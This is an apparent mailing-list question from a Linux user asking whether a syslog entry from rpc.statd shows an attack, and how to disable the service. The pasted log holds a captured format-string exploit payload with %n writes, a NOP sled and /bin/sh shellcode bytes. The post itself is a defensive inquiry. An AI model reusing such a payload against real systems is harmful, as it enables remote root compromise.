The following showed up in my syslog the other day.... Is this possbile
hacking?

What port is rpc.statd on?
What does it do?
What will break if it is turned off? and how to turn it off?
Only a few, selected ports, are listened on.  The last rule in my
firewall script is ipchains -l -A input -i eth0 -j DENY.

thank you.

  ------------------------------------------------------------------------

Mar 11 17:55:25 hostname /sbin/rpc.statd[156]: gethostbyname error for
^X<F7><FF>
<BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7>

<FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Mar 11 17:55:25 hostname
<C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\21
1<F3><B0>^K<CD>\200<B0>^A<CD>\200<E8>\177<FF><FF><FF>

Reply via email to